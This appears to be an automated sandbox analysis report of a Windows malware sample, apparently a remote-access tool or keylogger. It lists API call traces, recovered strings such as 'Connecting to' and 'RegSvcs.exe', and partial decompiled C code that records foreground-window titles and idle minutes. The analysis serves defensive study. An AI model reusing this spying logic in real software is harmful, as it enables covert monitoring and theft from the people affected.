                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF37
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF47
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013BCF51
                                              • Part of subcall function 013B20C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,013CBE70,?,013BCF62,0000004B), ref: 013B20D1
                                              • Part of subcall function 013B20C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B20E7
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004B), ref: 013BCF68
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCF74
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCF80
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCF8C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCF98
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFA4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFB0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFBC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFC8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFD4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFE0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFEC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BCFF8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD004
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD010
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD01C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD028
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD034
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD040
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD04C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD058
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD064
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD070
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD07C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD088
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD094
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0A0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0AC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0B8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0C4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0D0
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0DC
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0E8
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD0F4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD100
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD10C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD118
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD124
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD130
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD13C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD148
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD154
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD160
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD16C
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BD178
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD184
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD190
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD19C
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD1A8
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BD1B4
                                              • Part of subcall function 013B2149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6), ref: 013B215B
                                              • Part of subcall function 013B2149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6), ref: 013B2168
                                              • Part of subcall function 013B2149: malloc.MSVCRT ref: 013B2175
                                              • Part of subcall function 013B2149: recv.WS2_32(013CBE70,00000000,000003E8,00000000), ref: 013B2186
                                              • Part of subcall function 013B2149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8), ref: 013B219A
                                              • Part of subcall function 013B2149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21A4
                                              • Part of subcall function 013B2149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21AD
                                              • Part of subcall function 013B2149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21BA
                                              • Part of subcall function 013B2149: free.MSVCRT(00000000,013CBE70,013CB310,?,?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B21DB
                                              • Part of subcall function 013B2149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B2204
                                              • Part of subcall function 013B2149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013BD1C8,013BD2A6,00000001), ref: 013B220D
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Disconnected!,?), ref: 013BD20B
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013BD21F
                                            • CreateThread.KERNEL32 ref: 013BD240
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BD249
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013BD252
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002), ref: 013BD27E
                                            • atoi.MSVCRT ref: 013BD285
                                            • Sleep.KERNEL32(00000000), ref: 013BD293
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$D@1@@$?c_str@?$basic_string@V01@@$G@2@@std@@G@std@@$V10@$V01@$??4?$basic_string@$atoi$?length@?$basic_string@SleepV10@@$?size@?$basic_string@CloseCountCreateG@1@@InfoLocaleOpenQueryThreadTickValueY?$basic_string@_itoafreegethostbynamehtonsmallocrecvsprintf
                                            • String ID: %I64u$2.7.2 Pro$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$Connected to $Connecting to $Disconnected!$[INFO]$name
                                            • API String ID: 43808216-3236813304
                                            • Opcode ID: 7ee076977a4f43caa710337f34b51532f83764386b6a8bffa5b8b5bfb58922e6
                                            • Instruction ID: f9adef28978a8cd3635ff3cea8fab03cacc3d238f585ae2ce2efb75dc41f7fd2
                                            • Opcode Fuzzy Hash: 7ee076977a4f43caa710337f34b51532f83764386b6a8bffa5b8b5bfb58922e6
                                            • Instruction Fuzzy Hash: BE527471D0021AAFDB15BBA4EC59EEEBB7CAF64709F004099E506A2144EF707F498F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C35DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013C35EE
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C3626
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 013C365D
                                            • _wgetenv.MSVCRT ref: 013C366D
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013C3678
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013C3683
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C368F
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C3698
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C36A1
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C36AA
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 013C36BE
                                            • _wgetenv.MSVCRT ref: 013C36CE
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 013C36D9
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013C36E4
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C36F0
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C36F9
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C3702
                                            • _wgetenv.MSVCRT ref: 013C3720
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 013C372B
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,013CBCB0), ref: 013C3741
                                            • GetLongPathNameW.KERNELBASE(00000000), ref: 013C3748
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 013C375A
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C5A24,?,00000000), ref: 013C376D
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 013C3783
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013C378E
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 013C379A
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C37A5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C37AE
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C37B7
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C37C0
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C37C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                            • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                            • API String ID: 1999370131-1609423294
                                            • Opcode ID: aff679bbb19d522c2330269d6068cb5d9626fe0523962bd4c041e22c8d94d787
                                            • Instruction ID: c1f06542d9b9b3d3235b57e11da4fa084bb12b9e95971b9cafc2f0f9ea90b8b0
                                            • Opcode Fuzzy Hash: aff679bbb19d522c2330269d6068cb5d9626fe0523962bd4c041e22c8d94d787
                                            • Instruction Fuzzy Hash: D251C3B290010AAFCB15EFA0E99A9EE777CFF14709F504119F503E2144EA757E09CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B55E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(00002710), ref: 013B5607
                                              • Part of subcall function 013B5532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,013C5664,?,013CBCB0,013B5614), ref: 013B5562
                                              • Part of subcall function 013B5532: CreateFileW.KERNELBASE(00000000), ref: 013B5569
                                              • Part of subcall function 013B5532: GetFileSize.KERNEL32(00000000,00000000), ref: 013B5578
                                              • Part of subcall function 013B5532: Sleep.KERNEL32(00002710), ref: 013B55A7
                                              • Part of subcall function 013B5532: FindCloseChangeNotification.KERNELBASE(00000000), ref: 013B55AE
                                              • Part of subcall function 013B5532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B55D6
                                            • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,013C5664), ref: 013B5619
                                            • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 013B562E
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B563F
                                            • CreateDirectoryW.KERNELBASE(00000000), ref: 013B5646
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 013B5651
                                            • GetFileAttributesW.KERNELBASE(00000000), ref: 013B5658
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 013B5669
                                            • SetFileAttributesW.KERNELBASE(00000000), ref: 013B5670
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 013B5681
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 013B5690
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 013B569D
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B56AA
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B56C5
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B56D0
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B56DC
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 013B56F0
                                            • PathFileExistsW.SHLWAPI(00000000), ref: 013B56F7
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 013B5708
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 013B5714
                                              • Part of subcall function 013C2DDF: CreateFileW.KERNEL32(747DF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,747DF560,?,013B9C9F,00000000), ref: 013C2DF9
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B5729
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 013B574D
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B5756
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B5733
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,013B8CAD,00000000), ref: 013B30B4
                                              • Part of subcall function 013B309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 013B30C0
                                              • Part of subcall function 013B309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 013B30D5
                                              • Part of subcall function 013B309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B30DE
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B575F
                                            • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 013B576F
                                            • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 013B5778
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 013B5782
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 013B579A
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013B57AA
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B57BB
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B57C4
                                            • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(013C5664), ref: 013B57D1
                                            • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 013B57E2
                                            • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 013B57F1
                                            • SetFileAttributesW.KERNEL32(00000000), ref: 013B57F8
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                            • String ID:
                                            • API String ID: 131886942-0
                                            • Opcode ID: 1fb5d1baff93f968df5d067d353ddc3b85359752f5592ae19f9e6202d3fd42b7
                                            • Instruction ID: 9580693548c7962b6736a1c52e8bb606ca0cae24e59d3908489b3a265fde2e0c
                                            • Opcode Fuzzy Hash: 1fb5d1baff93f968df5d067d353ddc3b85359752f5592ae19f9e6202d3fd42b7
                                            • Instruction Fuzzy Hash: C9513D72B00109AFCB25ABA4E85DAEE7B7DAF5871AF040059F603D7194DF70B945CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B59BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 37%
                                            			E013B59BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				struct HWND__* _t42;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x13cb990 & 0x00000001) == 0) {
						 *0x13cb990 =  *0x13cb990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E013C3E72(E013B5BB5);
					}
					Sleep(0x1f4); // executed
					_t42 = GetForegroundWindow(); // executed
					_t93 = _t42;
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58, 0x13cb998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x13cb93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L013C4176();
								L013C4170();
								_t99 = _t99 - 0x10 + 0x18;
								E013B54E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E013B5DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94; // executed
					E013B6C35(_t94); // executed
					if(E013C269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E013C269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L013C4176();
								L013C4170();
